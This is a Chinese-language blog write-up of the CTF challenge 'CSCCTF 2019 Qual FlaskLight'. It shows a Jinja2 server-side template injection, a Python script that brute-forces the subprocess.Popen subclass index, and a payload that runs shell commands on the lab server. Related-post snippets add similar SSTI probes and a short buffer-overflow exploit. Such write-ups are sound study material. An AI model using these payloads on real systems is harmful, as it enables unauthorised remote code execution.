[CSCCTF 2019 Qual]FlaskLight 记录

最新推荐文章于 2023-02-09 09:17:41 发布
最新推荐文章于 2023-02-09 09:17:41 发布
阅读量882 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108985950
版权

这个根据题目名字,flask模板注入,找注入点
在这里插入图片描述

查看源码发现GET传参
直接测试模板注入
在这里插入图片描述

常规模板注入
试了试之前做过的模板注入,都行不通
然后百度了一波,原来这是python2的
难怪不行

{{''.__class__.__mro__[2].__subclasses__()}}

利用这个可以读取所有的类,然后看看能不能RCE
找到catch_warnings类,
在这里插入图片描述
但是无法RCE
看了wp,发现可以利用subprocess.Popen这个类来进行RCE
学废了
网上搜的模板注入,都没说这个类,emmmm
找索引

import requests
import html
import time

for i in range(0,300):
    time.sleep(0.06)
    url='http://4d0aed10-26a2-4108-8b17-9c8aa555ca2d.node3.buuoj.cn?search={{\'\'.__class__.__mro__[2].__subclasses__()[%d]}}' %(i)
    r = requests.get(url)
    print(url)
    if "subprocess.Popen" in html.unescape(r.text):
        print(i)
        break

在这里插入图片描述
索引为258
payload

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

查看flasklight目录
在这里插入图片描述
另外一个就是flag

penson by 小乌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
[CSCCTF 2019 Qual] FlaskLight
汗的博客
08-29 1545
信息收集 index大致就这样,没什么信息 F12看下,发现了线索:search参数 试下ssti 基本就是ssti了 漏洞利用 config 也是 Flask模版中的一个全局对象,它包含了所有应用程序的配置值。 {{ config.items() }} // 查看配置项目的信息 输入:http://xxxxx//?search={{%20config.items()%20}} 爆出一堆信息,这里获得第二个线索,flag在这个目录 You searched for: [('JSON_
QUAL2K模型
04-22
QUAL2K模型是一个综合性、多样化的河流水质模型,不仅适用于复杂的树枝状河流系统,还允许多个取水口、排污口存在以及支流流入流出,被广泛应用于流域污染物总量控制和水质管理。
CSCCTF-2019-Qual-FlaskLight
Tajang的大千世界
02-09 298
CTF
[CSCCTF 2019 Qual]FlaskLight
qq_35231971的博客
08-09 1124
[CSCCTF 2019 Qual]FlaskLight
checker-qual-3.5.0-API文档-中文版.zip
06-05
赠送jar包:checker-qual-3.5.0.jar; 赠送原API文档:checker-qual-3.5.0-javadoc.jar; 赠送源代码:checker-qual-3.5.0-sources.jar; 赠送Maven依赖信息文件:checker-qual-3.5.0.pom; 包含翻译后的API文档:...
qual2k模型论文
10-15
qual2k 模拟 水质模型 参数模拟设置 如何计算 适用于研究生水质模型计算参考
checker-compat-qual-2.0.0-API文档-中文版.zip
06-05
赠送jar包:checker-compat-qual-2.0.0.jar; 赠送原API文档:checker-compat-qual-2.0.0-javadoc.jar; 赠送源代码:checker-compat-qual-2.0.0-sources.jar; 赠送Maven依赖信息文件:checker-compat-qual-2.0.0....
checker-qual-2.11.1-API文档-中英对照版.zip
07-14
赠送jar包:checker-qual-2.11.1.jar; 赠送原API文档:checker-qual-2.11.1-javadoc.jar; 赠送源代码:checker-qual-2.11.1-sources.jar; 赠送Maven依赖信息文件:checker-qual-2.11.1.pom; 包含翻译后的API文档...
BUUCTF:[CSCCTF 2019 Qual]FlaskLight
末初的CSDN博客
07-26 2747
题目地址:https://buuoj.cn/challenges#[CSCCTF%202019%20Qual]FlaskLight ?search={{7*7}} #通过回显判断SSTI ?search={{''.__class__.__mro__[2].__subclasses__()}} #爆出所有类 编写脚本查找可利用的类 利用subprocess.Popen执行命令 import requests import re import html import time index = 0 f
[CSCCTF 2019 Qual]FlaskLight——直取flag?
Mrs_H的博客
11-16 2203
[CSCCTF 2019 Qual]FlaskLight 前言 白天一直在上课,晚上赶快躲进图书馆里面打打靶场。这次的题目算是很简单的一道题目了,我做完之后还去看了看其他师傅写的博客,只能感叹一声太强了。我根本就没有考虑这些,就直接去找flag了。 正文 很喜欢这样的题目,在每一步之后出题人都会贴心的留下下一步的线索,不至于做完第一步后,不知道自己在干嘛,甚至是不知道自己第一步做对了没有。打开题目 出题人让我们用get进行传参,向这个网站里面传一个search进去。我们尝试之后发现这个地方存在SSTI。
[CSCCTF 2019 Qual]FlaskLight SSTI注入
qq_54929891的博客
04-05 2287
进去后页面提示你是flask框架,f12里面告诉你参数名字叫做search并且用GET方法传输,十有八九是模块注入了,用7*7试试服务端模板注入攻击 - 知乎 可以发现在searched后面输出了49,既然我们可以利用{{}},又有输出点,直接模板注入GOGOGO python-flask模块注入(SSTI) - ctrl_TT豆 - 博客园因为不太熟,只能一步步来 ''.__class__ //先随便查看一个字符所属的类是什么 ''.__class__.__mro__ //返回...
buuoj Pwn writeup 276-280
yongbaoii的博客
09-06 308
276 axb_2019_final_blindHeap 朴实而无华。 277 codegate2018_melong 278 whctf2017_note_sys 279 pwnable_wtf 显然整数溢出,然后栈溢出就好啦。 exp from pwn import * r = remote('node4.buuoj.cn', 28374) win = 0x4005F4 payload = 0x38 * 'a' + p64(win) r.sendline("-1") r.sendline
BUUCTF pwn 五月刷题
coco的博客
05-04 679
actf_2019_babystack 典型的stack pivot,告诉了输入时候栈的地址,我们可以通过伪造ebp,通过两次leave将esp指向开始时候的栈地址。注意的是这里system("/bin/sh")有问题,换了one gadget才成功,不是很清楚为什么。 from pwn import * context.log_level = "debug" context.terminal ...
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3309
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
thermo xcalibur qual browser 下载
最新发布
09-23
thermo xcalibur qual browser 是为了分析质谱数据而设计的一款软件。 要下载 thermo xcalibur qual browser,可以按照以下步骤进行: 1. 首先,打开谷歌浏览器或其他任何你常用的浏览器。 2. 在搜索栏中输入 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值